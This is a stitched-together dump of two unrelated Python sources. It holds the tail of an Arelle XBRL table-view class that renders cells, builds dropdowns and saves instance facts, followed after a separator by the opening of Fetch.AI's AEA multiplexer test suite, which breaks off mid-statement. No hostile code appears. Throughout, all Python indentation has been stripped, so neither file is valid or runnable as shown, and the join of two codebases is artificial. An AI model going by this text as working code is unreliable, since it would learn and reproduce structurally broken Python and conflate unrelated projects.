xAspectStructuralNodes[aspect].add(xStructuralNode)
cellTagSelectors = yTagSelectors | xStructuralNode.tagSelectors
cellAspectValues = {}
matchableAspects = set()
for aspect in _DICT_SET(xAspectStructuralNodes.keys()) | _DICT_SET(yAspectStructuralNodes.keys()) | _DICT_SET(zAspectStructuralNodes.keys()):
aspectValue = xStructuralNode.inheritedAspectValue(yStructuralNode,
self, aspect, cellTagSelectors,
xAspectStructuralNodes, yAspectStructuralNodes, zAspectStructuralNodes)
# value is None for a dimension whose value is to be not reported in this slice
if (isinstance(aspect, _INT) or # not a dimension
dimDefaults.get(aspect) != aspectValue or # explicit dim defaulted will equal the value
aspectValue is not None): # typed dim absent will be none
cellAspectValues[aspect] = aspectValue
matchableAspects.add(aspectModelAspect.get(aspect,aspect)) #filterable aspect from rule aspect
cellDefaultedDims = _DICT_SET(dimDefaults) - _DICT_SET(cellAspectValues.keys())
priItemQname = cellAspectValues.get(Aspect.CONCEPT)
concept = self.modelXbrl.qnameConcepts.get(priItemQname)
conceptNotAbstract = concept is None or not concept.isAbstract
value = None
objectId = None
justify = None
fp = FactPrototype(self, cellAspectValues)
if conceptNotAbstract:
# reduce set of matchable facts to those with pri item qname and have dimension aspects
facts = self.modelXbrl.factsByQname[priItemQname] if priItemQname else self.modelXbrl.factsInInstance
if self.hasTableFilters:
facts = self.modelTable.filterFacts(self.rendrCntx, facts)
for aspect in matchableAspects: # trim down facts with explicit dimensions match or just present
if isinstance(aspect, QName):
aspectValue = cellAspectValues.get(aspect, None)
if isinstance(aspectValue, ModelDimensionValue):
if aspectValue.isExplicit:
dimMemQname = aspectValue.memberQname # match facts with this explicit value
else:
dimMemQname = None # match facts that report this dimension
elif isinstance(aspectValue, QName):
dimMemQname = aspectValue # match facts that have this explicit value
elif aspectValue is None: # match typed dims that don't report this value
dimMemQname = ModelXbrl.DEFAULT
else:
dimMemQname = None # match facts that report this dimension
facts = facts & self.modelXbrl.factsByDimMemQname(aspect, dimMemQname)
if len(facts)==0:
break;
for fact in facts:
if (all(aspectMatches(self.rendrCntx, fact, fp, aspect)
for aspect in matchableAspects) and
all(fact.context.dimMemberQname(dim,includeDefaults=True) in (dimDefaults[dim], None)
for dim in cellDefaultedDims) and
len(fp.context.qnameDims) == len(fact.context.qnameDims)):
if yStructuralNode.hasValueExpression(xStructuralNode):
value = yStructuralNode.evalValueExpression(fact, xStructuralNode)
else:
value = fact.effectiveValue
objectId = fact.objectId()
justify = XbrlTable.TG_RIGHT_JUSTIFIED if fact.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
break
if (conceptNotAbstract and
(value is not None or ignoreDimValidity or isFactDimensionallyValid(self, fp) or
isEntryPrototype)):
if objectId is None:
objectId = "f{0}".format(len(self.factPrototypes))
self.factPrototypes.append(fp) # for property views
for aspect, aspectValue in cellAspectValues.items():
if isinstance(aspectValue, str) and aspectValue.startswith(OPEN_ASPECT_ENTRY_SURROGATE):
self.factPrototypeAspectEntryObjectIds[objectId].add(aspectValue)
modelConcept = fp.concept
if (justify is None) and modelConcept is not None:
justify = XbrlTable.TG_RIGHT_JUSTIFIED if modelConcept.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
if modelConcept is not None and modelConcept.isEnumeration:
myValidationObject = ValidateXbrl(self.modelXbrl)
myValidationObject.modelXbrl = self.modelXbrl
enumerationSet = ValidateXbrlDimensions.usableEnumerationMembers(myValidationObject, modelConcept)
enumerationDict = dict()
for enumerationItem in enumerationSet:
# we need to specify the concept linkrole to sort out between possibly many different labels
enumerationDict[enumerationItem.label(linkrole=modelConcept.enumLinkrole)] = enumerationItem.qname
enumerationValues = sorted(list(enumerationDict.keys()))
enumerationQNameStrings = [""]+list(str(enumerationDict[enumerationItem]) for enumerationItem in enumerationValues)
enumerationValues = [""]+enumerationValues
try:
selectedIdx = enumerationQNameStrings.index(value)
effectiveValue = enumerationValues[selectedIdx]
except ValueError:
effectiveValue = enumerationValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
enumerationValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx,
codes=enumerationDict)
elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliQNameItemType:
if eurofilingModelPrefix in concept.nsmap and concept.nsmap.get(eurofilingModelPrefix) == eurofilingModelNamespace:
hierarchy = concept.get("{" + eurofilingModelNamespace + "}" + "hierarchy", None)
domainQNameAsString = concept.get("{" + eurofilingModelNamespace + "}" + "domain", None)
if hierarchy is not None and domainQNameAsString is not None:
newAspectValues = [""]
newAspectQNames = dict()
newAspectQNames[""] = None
domPrefix, _, domLocalName = domainQNameAsString.strip().rpartition(":")
domNamespace = concept.nsmap.get(domPrefix)
relationships = concept_relationships(self.rendrCntx,
None,
(QName(domPrefix, domNamespace, domLocalName),
hierarchy, # linkrole,
"XBRL-dimensions",
'descendant'),
False) # return flat list
for rel in relationships:
if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
and rel.isUsable):
header = rel.toModelObject.label(lang=self.lang)
newAspectValues.append(header)
currentQName = rel.toModelObject.qname
if str(currentQName) == value:
value = header
newAspectQNames[header] = currentQName
else:
newAspectValues = None
else:
newAspectValues = None
if newAspectValues is None:
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellValue(value,
xValue,
yValue,
justification=justify,
objectId=objectId,
backgroundColourTag=self.getbackgroundColor(fp))
else:
qNameValues = newAspectValues
try:
selectedIdx = qNameValues.index(value)
effectiveValue = value
except ValueError:
effectiveValue = qNameValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
qNameValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx,
codes=newAspectQNames)
elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliBooleanItemType:
booleanValues = ["",
XbrlConst.booleanValueTrue,
XbrlConst.booleanValueFalse]
try:
selectedIdx = booleanValues.index(value)
effectiveValue = value
except ValueError:
effectiveValue = booleanValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
booleanValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx)
else:
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellValue(value,
xValue,
yValue,
justification=justify,
objectId=objectId,
backgroundColourTag=self.getbackgroundColor(fp))
else:
fp.clear() # dereference
row += 1
if not yChildrenFirst:
row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
return row
def onClick(self, event):
try:
objId = event.widget.objectId
if objId and objId[0] == "f":
viewableObject = self.factPrototypes[int(objId[1:])]
else:
viewableObject = objId
self.modelXbrl.viewModelObject(viewableObject)
except AttributeError: # not clickable
pass
self.modelXbrl.modelManager.cntlr.currentView = self
def cellEnter(self, *args):
# triggered on grid frame enter (not cell enter)
self.blockSelectEvent = 0
self.modelXbrl.modelManager.cntlr.currentView = self
def cellLeave(self, *args):
# triggered on grid frame leave (not cell leave)
self.blockSelectEvent = 1
# this method is not currently used
def cellSelect(self, *args):
if self.blockSelectEvent == 0 and self.blockViewModelObject == 0:
self.blockViewModelObject += 1
#self.modelXbrl.viewModelObject(self.nodeToObjectId[self.treeView.selection()[0]])
#self.modelXbrl.viewModelObject(self.treeView.selection()[0])
self.blockViewModelObject -= 1
def viewModelObject(self, modelObject):
if self.blockViewModelObject == 0:
self.blockViewModelObject += 1
try:
if isinstance(modelObject, ModelDtsObject.ModelRelationship):
objectId = modelObject.toModelObject.objectId()
else:
objectId = modelObject.objectId()
if objectId in self.tablesToELR:
self.view(viewTblELR=self.tablesToELR[objectId])
try:
self.modelXbrl.modelManager.cntlr.currentView = self.modelXbrl.guiViews.tableView
# force focus (synch) on the corresponding "Table" tab (useful in case of several instances)
self.modelXbrl.guiViews.tableView.tabWin.select(str(self.modelXbrl.guiViews.tableView.viewFrame))
except:
pass
except (KeyError, AttributeError):
pass
self.blockViewModelObject -= 1
def onConfigure(self, event, *args):
if not self.blockMenuEvents:
lastFrameWidth = getattr(self, "lastFrameWidth", 0)
lastFrameHeight = getattr(self, "lastFrameHeight", 0)
frameWidth = self.tabWin.winfo_width()
frameHeight = self.tabWin.winfo_height()
if lastFrameWidth != frameWidth or lastFrameHeight != frameHeight:
self.updateInstanceFromFactPrototypes()
self.lastFrameWidth = frameWidth
self.lastFrameHeight = frameHeight
self.setHeightAndWidth()
if lastFrameWidth:
# frame resized, recompute row header column widths and lay out table columns
"""
def sleepAndReload():
time.sleep(.75)
self.viewReloadDueToMenuAction()
self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((sleepAndReload, []))
"""
#self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((self.viewReloadDueToMenuAction, []))
def deferredReload():
self.deferredReloadCount -= 1 # only do reload after all queued reload timers expire
if self.deferredReloadCount <= 0:
self.viewReloadDueToMenuAction()
self.deferredReloadCount = getattr(self, "deferredReloadCount", 0) + 1
self.viewFrame.after(1500, deferredReload)
def onQuitView(self, event, *args):
# this method is passed as callback when creating the view
# (to ScrolledTkTableFrame and then to XbrlTable that will monitor cell operations)
self.updateInstanceFromFactPrototypes()
self.updateProperties()
def hasChangesToSave(self):
return len(self.table.modifiedCells)
def updateProperties(self):
if self.modelXbrl is not None:
modelXbrl = self.modelXbrl
# make sure we handle an instance
if modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
tbl = self.table
# get coordinates of last currently operated cell
coordinates = tbl.getCurrentCellCoordinates()
if coordinates is not None:
# get object identifier from its coordinates in the current table
objId = tbl.getObjectId(coordinates)
if objId is not None and len(objId) > 0:
if objId and objId[0] == "f":
# fact prototype
viewableObject = self.factPrototypes[int(objId[1:])]
elif objId[0] != "a":
# instance fact
viewableObject = self.modelXbrl.modelObject(objId)
else:
return
modelXbrl.viewModelObject(viewableObject)
def updateInstanceFromFactPrototypes(self):
# Only update the model if it already exists
if self.modelXbrl is not None \
and self.modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
instance = self.modelXbrl
cntlr = instance.modelManager.cntlr
newCntx = ModelXbrl.AUTO_LOCATE_ELEMENT
newUnit = ModelXbrl.AUTO_LOCATE_ELEMENT
tbl = self.table
# check user keyed changes to aspects
aspectEntryChanges = {} # index = widget ID, value = widget contents
aspectEntryChangeIds = _DICT_SET(aspectEntryChanges.keys())
for modifiedCell in tbl.getCoordinatesOfModifiedCells():
objId = tbl.getObjectId(modifiedCell)
if objId is not None and len(objId)>0:
if tbl.isHeaderCell(modifiedCell):
if objId[0] == OPEN_ASPECT_ENTRY_SURROGATE:
aspectEntryChanges[objId] = tbl.getTableValue(modifiedCell)
else:
# check user keyed changes to facts
cellIndex = str(modifiedCell)
comboboxCells = tbl.window_names(cellIndex)
if comboboxCells is not None and len(comboboxCells)>0:
comboName = tbl.window_cget(cellIndex, '-window')
combobox = cntlr.parent.nametowidget(comboName)
else:
combobox = None
if isinstance(combobox, _Combobox):
codeDict = combobox.codes
if len(codeDict)>0: # the drop-down list shows labels, we want to have the actual values
bodyCellValue = tbl.getTableValue(modifiedCell)
value = codeDict.get(bodyCellValue, None)
if value is None:
value = bodyCellValue # this must be a qname!
else:
value = tbl.getTableValue(modifiedCell)
else:
value = tbl.getTableValue(modifiedCell)
objId = tbl.getObjectId(modifiedCell)
if objId is not None and len(objId)>0:
if objId[0] == "f":
factPrototypeIndex = int(objId[1:])
factPrototype = self.factPrototypes[factPrototypeIndex]
concept = factPrototype.concept
if concept is None:
if not self.conceptMessageIssued:
# This should be removed once cells have been disabled until every needed selection is done
self.conceptMessageIssued = True
self.modelXbrl.modelManager.cntlr.showMessage(_("Please make sure every Z axis selection is done"))
return
else:
self.conceptMessageIssued = False
entityIdentScheme = self.newFactItemOptions.entityIdentScheme
entityIdentValue = self.newFactItemOptions.entityIdentValue
periodType = concept.periodType
periodStart = self.newFactItemOptions.startDateDate if periodType == "duration" else None
periodEndInstant = self.newFactItemOptions.endDateDate
qnameDims = factPrototype.context.qnameDims
newAspectValues = self.newFactOpenAspects(objId)
if newAspectValues is None:
self.modelXbrl.modelManager.showStatus(_("Some open values are missing in an axis, the save is incomplete"), 5000)
continue
qnameDims.update(newAspectValues)
# open aspects widgets
prevCntx = instance.matchContext(
entityIdentScheme, entityIdentValue, periodType, periodStart, periodEndInstant,
qnameDims, [], [])
if prevCntx is not None:
cntxId = prevCntx.id
else: # need new context
newCntx = instance.createContext(entityIdentScheme, entityIdentValue,
periodType, periodStart, periodEndInstant,
concept.qname, qnameDims, [], [],
afterSibling=newCntx)
cntxId = newCntx.id # need new context
# new context
if concept.isNumeric:
if concept.isMonetary:
unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
decimals = self.newFactItemOptions.monetaryDecimals
elif concept.isShares:
unitMeasure = XbrlConst.qnXbrliShares
decimals = self.newFactItemOptions.nonMonetaryDecimals
else:
unitMeasure = XbrlConst.qnXbrliPure
decimals = self.newFactItemOptions.nonMonetaryDecimals
prevUnit = instance.matchUnit([unitMeasure], [])
if prevUnit is not None:
unitId = prevUnit.id
else:
newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
unitId = newUnit.id
attrs = [("contextRef", cntxId)]
if concept.isNumeric:
attrs.append(("unitRef", unitId))
attrs.append(("decimals", decimals))
value = Locale.atof(self.modelXbrl.locale, value, str.strip)
newFact = instance.createFact(concept.qname, attributes=attrs, text=value)
tbl.setObjectId(modifiedCell,
newFact.objectId()) # switch cell to now use fact ID
if self.factPrototypes[factPrototypeIndex] is not None:
self.factPrototypes[factPrototypeIndex].clear()
self.factPrototypes[factPrototypeIndex] = None #dereference fact prototype
elif objId[0] != "a": # instance fact, not prototype
fact = self.modelXbrl.modelObject(objId)
if fact.concept.isNumeric:
value = Locale.atof(self.modelXbrl.locale, value, str.strip)
if fact.concept.isMonetary:
unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
decimals = self.newFactItemOptions.monetaryDecimals
elif fact.concept.isShares:
unitMeasure = XbrlConst.qnXbrliShares
decimals = self.newFactItemOptions.nonMonetaryDecimals
else:
unitMeasure = XbrlConst.qnXbrliPure
decimals = self.newFactItemOptions.nonMonetaryDecimals
if fact.value != str(value):
if fact.isNil != (not value):
fact.isNil = not value
if fact.isNil:
pass
#TODO: clear out nil facts
if fact.concept.isNumeric and (not fact.isNil): # if nil, there is no need to update these values
fact.decimals = decimals
prevUnit = instance.matchUnit([unitMeasure], [])
if prevUnit is not None:
unitId = prevUnit.id
else:
newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
unitId = newUnit.id
fact.unitID = unitId
fact.text = str(value)
instance.setIsModified()
fact.xValid = UNVALIDATED
xmlValidate(instance, fact)
tbl.clearModificationStatus()
def saveInstance(self, newFilename=None, onSaved=None):
if (not self.newFactItemOptions.entityIdentScheme or # not initialized yet
not self.newFactItemOptions.entityIdentValue or
not self.newFactItemOptions.startDateDate or not self.newFactItemOptions.endDateDate):
if not getNewFactItemOptions(self.modelXbrl.modelManager.cntlr, self.newFactItemOptions):
return # new instance not set
# newFilename = None # only used when a new instance must be created
self.updateInstanceFromFactPrototypes()
if self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE and newFilename is None:
newFilename = self.modelXbrl.modelManager.cntlr.fileSave(view=self, fileType="xbrl")
if not newFilename:
return # saving cancelled
# continue saving in background
thread = threading.Thread(target=lambda: self.backgroundSaveInstance(newFilename, onSaved))
thread.daemon = True
thread.start()
def backgroundSaveInstance(self, newFilename=None, onSaved=None):
cntlr = self.modelXbrl.modelManager.cntlr
if newFilename and self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE:
self.modelXbrl.modelManager.showStatus(_("creating new instance {0}").format(os.path.basename(newFilename)))
self.modelXbrl.modelManager.cntlr.waitForUiThreadQueue() # force status update
self.modelXbrl.createInstance(newFilename) # creates an instance as this modelXbrl's entrypoint
instance = self.modelXbrl
cntlr.showStatus(_("Saving {0}").format(instance.modelDocument.basename))
cntlr.waitForUiThreadQueue() # force status update
self.updateInstanceFromFactPrototypes()
instance.saveInstance(newFilename) # may override prior filename for instance from main menu
cntlr.addToLog(_("{0} saved").format(newFilename if newFilename is not None else instance.modelDocument.filepath))
cntlr.showStatus(_("Saved {0}").format(instance.modelDocument.basename), clearAfter=3000)
if onSaved is not None:
self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((onSaved, []))
def newFactOpenAspects(self, factObjectId):
aspectValues = {}
for aspectObjId in self.factPrototypeAspectEntryObjectIds[factObjectId]:
structuralNode = self.aspectEntryObjectIdsNode[aspectObjId]
for aspect in structuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
gridCellItem = self.aspectEntryObjectIdsCell[aspectObjId]
value = gridCellItem.get()
# is aspect in a childStructuralNode?
if value is not None and OPEN_ASPECT_ENTRY_SURROGATE in aspectObjId and len(value)==0:
return None # some values are missing!
if value:
aspectValue = structuralNode.aspectEntryHeaderValues.get(value)
if aspectValue is None: # try converting value
if isinstance(aspect, QName): # dimension
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
# value must be qname
aspectValue = None # need to find member for the description
else:
typedDimElement = dimConcept.typedDomainElement
aspectValue = FunctionXfi.create_element(
self.rendrCntx, None, (typedDimElement.qname, (), value))
if aspectValue is not None:
aspectValues[aspect] = aspectValue
return aspectValues
def aspectEntryValues(self, structuralNode):
for aspect in structuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
# if findHeader is None, return all header values in a list
# otherwise return aspect value matching header if any
depth = 0
n = structuralNode
while (n.parentStructuralNode is not None):
depth += 1
root = n = n.parentStructuralNode
headers = set()
headerValues = {}
def getHeaders(n, d):
for childStructuralNode in n.childStructuralNodes:
if d == depth:
h = childStructuralNode.header(lang=self.lang,
returnGenLabel=False,
returnMsgFormatString=False)
if not childStructuralNode.isEntryPrototype() and h:
headerValues[h] = childStructuralNode.aspectValue(aspect)
headers.add(h)
else:
getHeaders(childStructuralNode, d+1)
getHeaders(root, 1)
structuralNode.aspectEntryHeaderValues = headerValues
# is this an explicit dimension, if so add "(all members)" option at end
headersList = sorted(headers)
if isinstance(aspect, QName): # dimension
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
if headersList: # has entries, add all-memembers at end
headersList.append("(all members)")
else: # empty list, just add all members anyway
return self.explicitDimensionFilterMembers(structuralNode, structuralNode)
return headersList
def onAspectComboboxSelection(self, event):
gridCombobox = event.widget
if gridCombobox.get() == "(all members)":
structuralNode = self.aspectEntryObjectIdsNode[gridCombobox.objectId]
self.comboboxLoadExplicitDimension(gridCombobox, structuralNode, structuralNode)
def comboboxLoadExplicitDimension(self, gridCombobox, structuralNode, structuralNodeWithFilter):
gridCombobox["values"] = self.explicitDimensionFilterMembers(structuralNode, structuralNodeWithFilter)
def explicitDimensionFilterMembers(self, structuralNode, structuralNodeWithFilter):
for aspect in structuralNodeWithFilter.aspectsCovered():
if isinstance(aspect, QName): # dimension
break
valueHeaders = set()
if structuralNode is not None:
headerValues = {}
# check for dimension filter(s)
dimFilterRels = structuralNodeWithFilter.definitionNode.filterRelationships
if dimFilterRels:
for rel in dimFilterRels:
dimFilter = rel.toModelObject
if dimFilter is not None:
for memberModel in dimFilter.memberProgs:
memQname = memberModel.qname
memConcept = self.modelXbrl.qnameConcepts.get(memQname)
if memConcept is not None and (not memberModel.axis or memberModel.axis.endswith('-self')):
header = memConcept.label(lang=self.lang)
valueHeaders.add(header)
if rel.isUsable:
headerValues[header] = memQname
else:
headerValues[header] = memConcept
if memberModel.axis and memberModel.linkrole and memberModel.arcrole:
# merge of pull request 42 acsone:TABLE_Z_AXIS_DESCENDANT_OR_SELF
if memberModel.axis.endswith('-or-self'):
searchAxis = memberModel.axis[:len(memberModel.axis)-len('-or-self')]
else:
searchAxis = memberModel.axis
relationships = concept_relationships(self.rendrCntx,
None,
(memQname,
memberModel.linkrole,
memberModel.arcrole,
searchAxis),
False) # return flat list
for rel in relationships:
if rel.isUsable:
header = rel.toModelObject.label(lang=self.lang)
valueHeaders.add(header)
headerValues[header] = rel.toModelObject.qname
if not valueHeaders:
relationships = concept_relationships(self.rendrCntx,
None,
(aspect,
"XBRL-all-linkroles", # linkrole,
"XBRL-dimensions",
'descendant'),
False) # return flat list
for rel in relationships:
if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
and rel.isUsable):
header = rel.toModelObject.label(lang=self.lang)
valueHeaders.add(header)
headerValues[header] = rel.toModelObject.qname
structuralNode.aspectEntryHeaderValues = headerValues
return sorted(valueHeaders)
# import after other modules resolved to prevent circular references
from arelle.FunctionXfi import concept_relationships
|
test_multiplexer.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for the Multiplexer."""
import asyncio
import logging
import shutil
import tempfile
import time
import unittest.mock
from pathlib import Path
from threading import Thread
from unittest import mock
from unittest.mock import patch
import pytest
import aea
from aea.configurations.base import PublicId
from aea.identity.base import Identity
from aea.mail.base import AEAConnectionError, Envelope, EnvelopeContext
from aea.multiplexer import AsyncMultiplexer, InBox, Multiplexer, OutBox
from aea.protocols.default.message import DefaultMessage
from packages.fetchai.connections.local.connection import LocalNode
from .conftest import (
UNKNOWN_CONNECTION_PUBLIC_ID,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_dummy_connection,
_make_local_connection,
_make_stub_connection,
logger,
)
@pytest.mark.asyncio
async def test_receiving_loop_terminated():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
multiplexer.connection_status.is_connected = False
await multiplexer._receiving_loop()
mock_logger_debug.assert_called_with("Receiving loop terminated.")
multiplexer.connection_status.is_connected = True
multiplexer.disconnect()
def test_connect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
def test_disconnect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
multiplexer.disconnect()
def test_connect_twice_with_loop():
"""Test that connecting twice the multiplexer behaves correctly."""
running_loop = asyncio.new_event_loop()
thread_loop = Thread(target=running_loop.run_forever)
thread_loop.start()
try:
multiplexer = Multiplexer([_make_dummy_connection()], loop=running_loop)
with unittest.mock.patch.object(
aea.mail.base.logger, "debug"
) as mock_logger_debug:
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
mock_logger_debug.assert_called_with("Multiplexer already connected.")
multiplexer.disconnect()
running_loop.call_soon_threadsafe(running_loop.stop)
finally:
thread_loop.join()
@pytest.mark.asyncio
async def test_connect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
assert not multiplexer.connection_status.is_connected
await multiplexer._connect_one(connection.connection_id)
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
await multiplexer._connect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already established."
)
await multiplexer._disconnect_one(connection.connection_id)
def test_multiplexer_connect_all_raises_error():
"""Test the case when the multiplexer raises an exception while connecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(multiplexer, "_connect_all", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
multiplexer.disconnect()
def test_multiplexer_connect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the connection of one connection."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
with unittest.mock.patch.object(connection_3, "connect", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_disconnect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
await multiplexer._disconnect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already disconnected."
)
def test_multiplexer_disconnect_all_raises_error():
"""Test the case when the multiplexer raises an exception while disconnecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
assert multiplexer.connection_status.is_connected
with unittest.mock.patch.object(
multiplexer, "_disconnect_all", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
# # do the true disconnection - for clean the test up
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
assert not multiplexer.connection_status.is_connected
@pytest.mark.asyncio
async def test_multiplexer_disconnect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the disconnection of one connection."""
with LocalNode() as node:
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.connect()
assert connection_1.is_connected
assert connection_2.is_connected
assert connection_3.is_connected
with unittest.mock.patch.object(
connection_3, "disconnect", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert connection_3.is_connected
# clean the test up.
await connection_3.disconnect()
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_sending_loop_does_not_start_if_multiplexer_not_connected():
"""Test that the sending loop is stopped does not start if the multiplexer is not connected."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
await multiplexer._send_loop()
mock_logger_debug.assert_called_with(
"Sending loop not started. The multiplexer is not connected."
)
@pytest.mark.asyncio
async def test_sending_loop_cancelled():
"""Test the case when the sending loop is cancelled."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
await asyncio.sleep(0.1)
with unittest.mock.patch.object(aea.mail.base.logger, "debug") as mock_logger_debug:
multiplexer.disconnect()
mock_logger_debug.assert_any_call("Sending loop cancelled.")
@pytest.mark.asyncio
async def test_receiving_loop_raises_exception():
"""Test the case when an error occurs when a receive is started."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with unittest.mock.patch("asyncio.wait", side_effect=Exception("a weird error.")):
with unittest.mock.patch.object(
aea.mail.base.logger, "error"
) as mock_logger_error:
multiplexer.connect()
time.sleep(0.1)
mock_logger_error.assert_called_with(
"Error in the receiving loop: a weird error.", exc_info=True
)
multiplexer.disconnect()
@pytest.mark.asyncio
async def test_send_envelope_with_non_registered_connection():
"""Test that sending an envelope with an unregistered connection raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=UNKNOWN_CONNECTION_PUBLIC_ID),
)
with pytest.raises(AEAConnectionError, match="No connection registered with id:.*"):
await multiplexer._send(envelope)
multiplexer.disconnect()
def test_send_envelope_error_is_logged_by_send_loop():
"""Test that the AEAConnectionError in the '_send' method is logged by the '_send_loop'."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
fake_connection_id = UNKNOWN_CONNECTION_PUBLIC_ID
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
